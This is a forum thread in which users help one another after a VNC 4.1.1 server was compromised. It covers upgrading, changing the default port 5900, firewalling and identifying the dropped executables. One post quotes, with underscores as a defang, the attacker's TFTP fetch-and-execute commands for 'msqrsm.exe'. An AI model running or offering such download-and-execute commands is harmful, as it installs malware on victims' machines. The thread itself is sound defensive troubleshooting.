DOS (tftp) virus

[cylosine]

Hi leiw,
May you find inspiration and help in the forum.

1.. Version 4.1.1 you can not get rid of fast enough, especially now you have seen that somebody knows perhaps accidentally that your servers exists.

Upgrading to 4.1.2 get you over the initial flaw ban if you are using the free version I would suggest you do review this for use over the internet. Reading the small print/manual or specs closer this is not recommended when you cross the internet jungle as the password encryption is not strong. The normal session information I understand is just open to anybody with no encryption.

I forgot this and happyly used it for 12 months until it went bad.  If your company information is.important you should consider the 'bigger' versions which have much better encryption and encryption on the session transmissions.  Convince yourself you understand all this because I am not an expert just have some reasonable understanding about various aspects of computing.

Consider moving away from using the default port of 5900, perhaps that may give you some protection. "everybody" knows that port and will almost by default have this in their software. Just makes it a little bit harder for unwanted sniffing.

I am deliberately using the underscore in the next lines

tftp -i 0.0.0.0 GET msqrsm_exe

msqrsm_exe

My understanding is the first line  downloads the dirty file to IP address 0.0.0.0 where I am not sure of the importance of 0.0.0.0, I had expected your Public IP address here, could be a very good thing.

The second line executes the msqrsm_exe, if it had been downloaded to your machines or network, you must go looking for how to get rid of what it has downloaded.

The only place I have seen help is PREVX1, I am still trying to find out more. Actually I have put our machine on sort of hold as I have run out of energy to focus on just this bastard.

Like you I have still no idea how our machine got activated.  Because we used vnc 4.1.1 I am assuming that somehow an accidental portscan revealed our existence on the net despite running in stealth mode behind a software firewall. Unforunately the NAT router was not installed on the cable modem. We did not have that extra protection, which you seem to have as you are on a 192.168.1.x network.

Do you have a software firewall as well as NAT, I may be a little bit out on deep water as you talked about servers and I talk about hosts. You may be better protected.

Have you facility to log all incoming and outgoing traffic?  If so this should reveal a lot about what msqrsm_exe.

Where it came from? No idea

Good luck and I hope it did not run.

C.

[leiw]

To Cylosine:

   Thank for your reply, I will go back to compay to upgrade the VNC to 4.1.2 version, one question is after upgraded the VNC, the auto command will be disappear ? or need use PREVX1 to clear all dirty file? but I think maybe cannot clear all dirty file, because I was tried it.

I using Shorewall that is Linux free firewall inculded NAT, packet filtering etc, now I droped all outgoing traffic for perevent, Iwill post the firewall log when I go back to company.

[cylosine]

Hi leiw

1.. The command windows may disappear, if they are coming from the outside.
2.. If you have any trace of malware still around, try PREVX1, I have still not found any other mention on the net. But I am not looking at the moment.
C.

[mauserme]

My understanding is the first line  downloads the dirty file to IP address 0.0.0.0 where I am not sure of the importance of 0.0.0.0, I had expected your Public IP address here, could be a very good thing.

I believe 0.0.0.0 designates "default route" in this case.  This way an outbound connection can be established without knowing the address for the gateway and may hide the underlying process to some degree.

Like you I have still no idea how our machine got activated.  Because we used vnc 4.1.1 I am assuming that somehow an accidental portscan revealed our existence on the net despite running in stealth mode behind a software firewall.

Certainly port 5900 is open during an active session but keep in mind that the GRC site doesn't scan that high (it only goes as high as port 1055 for the Scan All Service Ports test and includes port 5000 (but nothing higher) for the Common Ports test).  If you want to test this further you could try the scanning tools at PC Flank which has an option to specify a port under the Advanced Port Scanner tab

http://www.pcflank.com/scanner1s.htm

or a program like Nmap (use cautiously lest you get booted by your ISP).

From this point of view it could be a random scan but maybe more likely an attacker targeting the vulnerability.

1.. The command windows may disappear, if they are coming from the outside.
2.. If you have any trace of malware still around, try PREVX1, I have still not found any other mention on the net. But

I'm guessing #1 will be the case if your server is being cracked during an active session, but you might still need to remove malware (so far I haven't seen any indication that its originating on the client).

#2 is a definite if the problem originates on the server in the form of something like a trojan downloader.

The answer to which of these is the case may be in when the problems occur - only during an active session or randomly when the server is idling.  Does anyone have information on this?

[cylosine]

Hi mauserme,

About 0.0.0.0 I was hoping this was not the case, wonder what happened.

GRC test, thanks for pointing out the scan is limited to 'service' group.  I forgot that higher up one must be more specific, the largest range scan is 64 ports at a time. A scan of 5900-5963 only revealed that 5900 is known as vnc entry.

General: I have just done a search on the internet for following files, and listed what viruslabs seem to have some info:

msinexecs.exe    prevx
msqrsm.exe   prevx
winlolx.exe      prevx, sophus?
louvz.exe      nothing mentioned

Has anybody else seen better information on these?